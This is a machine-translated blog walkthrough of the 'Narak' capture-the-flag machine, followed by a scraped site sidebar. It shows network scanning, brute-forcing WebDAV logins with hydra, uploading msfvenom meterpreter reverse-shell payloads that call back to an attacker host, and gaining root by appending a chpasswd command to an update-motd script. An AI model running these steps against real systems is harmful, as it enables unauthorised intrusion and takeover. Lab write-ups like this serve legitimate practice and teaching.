当前位置:网站首页>Target narak
Target narak
2022-04-23 02:29:00 【Um, light】
The host found
nmap -sS 192.168.226.0/24
Port scanning
dirb Dictionary based directory scanning tool
Found three directories
Access the directory
Network storage file sharing WebDAV
Reuse hydra Below blasting
perhaps burpsuite Blast
yamdoot, Swarg
. Hydra (Hydra)
Medusa( Medusa )
patator
msf
Fine
use cewl The tool generates a dictionary by crawling the keywords of website information , Blasting through the generated dictionary
use hydra Blasting tools
-L Specify user name -P Specified password ip Address plus protocol plus path .http Is the agreement of the website ,get Is the request method used , Add path after
Try logging in again :
No information available , Check the source code :
cadaver Tool connection
cadaver http://192.168.8.132/webdav
username:yamdoot
password:Swarg
1. Baidu found webdav service , need cadaver Tool connection , After connecting, you can upload
Upload shell
nmap -O Found in fact linux System
msfvenom Create a Trojan
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.226.142 lport=22456 -f elf -o /home/kali/Desktop/yui.elf
monitor
Upload
liunx Failure, change to php Of
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.226.142 lport=22345 -f raw -o /home/kali/Desktop/phpshell.php
msf monitor
visit php file
shell Get
Raise the right Authority maintenance
Low authority
To view the user :
mnt Catalog hell.sh
https://www.splitbrain.org/services/ook
brainfuck to text decode , Get decrypted content chitragupt It should be the password
chitragupt
Power raising assistant Raise the right github Open source project
https://github.com/mzet-/linux-exploit-suggester
linux Medium .sh How files are executed ?
1、 direct ./ Add file name .sh, If running hello.sh by ./hello.sh 【 The absolute path can also , but hello.sh There has to be x jurisdiction 】
chmod u+x hello.sh
Try one by one
Upload and unzip
use ssh Try logging in to another user , Enter the password you just decrypted , Found that the user logged in successfully
echo “echo ‘root:inferno’|sudo chpasswd” >> /etc/update-motd.d/00-header
Exit and reuse inferno Sign in
su -root
Succeed in getting root jurisdiction : password inferno
版权声明
本文为[Um, light]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204230228310494.html
边栏推荐
- 009_Redis_RedisTemplate入门
- 全局、独享、局部路由守卫
- 006_ redis_ Jedis quick start
- IAR嵌入式開發STM32f103c8t6之點亮LED燈
- PHP sorting of interview questions on April 20, 2022
- [untitled]
- PTA: 浪漫倒影 [二叉树重建] [深度优先遍历]
- Flink real-time data warehouse project - Design and implementation of DWS layer
- ThinkPHP kernel development blind box mall source code v2 0 docking easy payment / Alibaba cloud SMS / qiniu cloud storage
- 002_ Redis_ Common operation commands of string type
猜你喜欢
89 régression logistique prédiction de la réponse de l'utilisateur à l'image de l'utilisateur
Dynamic batch processing and static batch processing of unity
手写内存池以及原理代码分析【C语言】
So library dependency
010_ StringRedisTemplate
Unicorn bio raised $3.2 million to turn prototype equipment used to grow meat into commercial products
Halo open source project learning (I): project launch
001_ Redis set survival time
R language advanced | generalized vector and attribute analysis
Dynamic memory management
随机推荐
Go language ⌈ mutex and state coordination ⌋
智能辅助功能丰富,思皓X6安全配置曝光:将于4月23日预售
Develop a chrome plug-in from 0 (2)
Leetcode39 combined sum
Usage of vector common interface
[assembly language] understand "stack" from the lowest point of view
001_redis设置存活时间
php 2022年4月20面试题整理
想体验HomeKit智能家居?不如来看看这款智能生态
The usage and difference of * and & in C language and the meaning of keywords static and volatile
C语言中*与&的用法与区别 以及关键字static和volatile 的含义
005_ redis_ Set set
Day18 -- stack queue
Want to experience homekit smart home? Why don't you take a look at this smart ecosystem
RT_ Thread ask and answer
[NK] Niuke monthly race 48 D
RT_Thread自问自答
WordPress calls the specified page content. 2 get_ children()
Rich intelligent auxiliary functions and exposure of Sihao X6 security configuration: it will be pre sold on April 23
Heap overflow of kernel PWN basic tutorial